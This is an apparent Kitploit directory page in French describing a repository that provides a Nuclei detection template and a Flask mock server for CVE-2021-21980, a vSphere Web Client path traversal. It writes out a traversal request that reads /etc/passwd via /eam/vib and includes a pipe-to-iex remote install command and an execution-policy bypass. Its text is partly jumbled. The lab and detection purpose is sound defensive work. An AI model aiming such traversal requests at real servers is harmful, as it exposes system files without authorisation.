Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
cve-2021-21980-mock-server — CVE-2021-21980 | Kitploit
Outils/GitHubGitHub/gui2000guix-ui/cve-2021-21980-mock-server
Scanners de VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationLabs et Pratique
GitHubgui2000guix-ui/cve-2021-21980-mock-server

cve-2021-21980-mock-server

CVE-2021-21980

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
il y a 8 moisPas encore vérifié

Clippy of the Dead - Environnement de test pour CVE-2021-21980 et modèle Nuclei

Ce dépôt contient un modèle Nuclei très fiable pour détecter CVE-2021-21980 (traversée de chemin de vSphere Web Client) et un petit environnement simulé qui reproduit le comportement vulnérable pour des tests locaux en toute sécurité.

Fichiers :

  • cve-2021-21980.yaml : modèle Nuclei avec plusieurs variantes d'encodage et matchers
  • app.py : une petite application Flask simulant la vulnérabilité de traversée de chemin /eam/vib
  • Dockerfile : image de conteneur pour le serveur simulé avec un certificat TLS auto-signé
  • docker-compose.yml : exécute le serveur simulé en écoute sur l'hôte 8443
  • requirements.txt : dépendances Python

Avertissement

  • Ce dépôt est uniquement destiné à la recherche, aux tests et à la défense. Ne l'utilisez pas contre un système que vous n'êtes pas autorisé à scanner.
  • Ce serveur simulé n'est pas VMware vCenter ; il ne fait que simuler le comportement vulnérable pour un PoC/des tests sûrs.

Comment exécuter localement (exemple Windows PowerShell)

  1. Construire et lancer le conteneur simulé :
root@kitploit:~
cd C:\Users\gui\Documents\hi
docker-compose up --build -d

Le serveur simulé écoutera sur https://localhost:8443 (certificat TLS auto-signé).

  1. Vérification rapide avec curl (option insecure car certificat auto-signé) :
root@kitploit:~
curl -k "https://localhost:8443/"  # should return VMware vSphere Web Client (mock)
curl -k "https://localhost:8443/eam/vib?id=../../../../../../../../../../etc/passwd"

Vous devriez recevoir le contenu du fichier simulé /app/sensitive/passwd-mock.

  1. Exécuter Nuclei (installer Nuclei d'abord) pour valider le modèle sur le serveur simulé :
root@kitploit:~
nuclei -t cve-2021-21980.yaml -u https://localhost:8443 -insecure
  1. La sortie doit afficher une correspondance pour le PoC en cas de succès.

Notes de test

  • Si vous souhaitez tester de nombreuses variantes d'encodage, configurez le modèle Nuclei pour qu'il s'exécute avec une verbosité élevée.

  • Ce serveur simulé renvoie le fichier simulé qui reproduit /etc/passwd ; dans un environnement réel Script de test automatisé

    Exécute run_local_test.ps1 qui construit, attend que le service soit prêt et exécute les vérifications curl, ainsi que Nuclei si disponible.

    root@kitploit:~
    powershell -ExecutionPolicy Bypass -File .\run_local_test.ps1
    

    Installer Nuclei sur Windows (rapide) :

    1. Avec Scoop (recommandé) :
    root@kitploit:~
    iwr -useb get.scoop.sh | iex
    scoop install coreutils
    scoop install nuclei
    
    1. Ou télécharger depuis les releases et l'ajouter au PATH :
    root@kitploit:~
    Invoke-WebRequest -Uri https://github.com/projectdiscovery/nuclei/releases/latest/download/nuclei_windows_amd64.zip -OutFile nuclei.zip
    Expand-Archive -Path nuclei.zip -DestinationPath .\nuclei
    Add-Content -Path $PROFILE -Value 'set PATH=$Env:PATH;$(Resolve-Path .\nuclei)'
    

    Notes

Sécurité : ayez toujours une autorisation explicite avant de scanner ou d'exploiter des systèmes.

Télécharger l’outil

Si nuclei n'est pas dans le PATH, run_local_test.ps1 s'exécutera uniquement jusqu'aux tests curl.
Si vous rencontrez un problème lors de la construction de l'image Docker, assurez-vous que Docker Desktop est installé et que l'option 'Use the WSL 2 based engine' est activée. /etc/passwd ou un fichier similaire sera renvoyé si le serveur est vulnérable.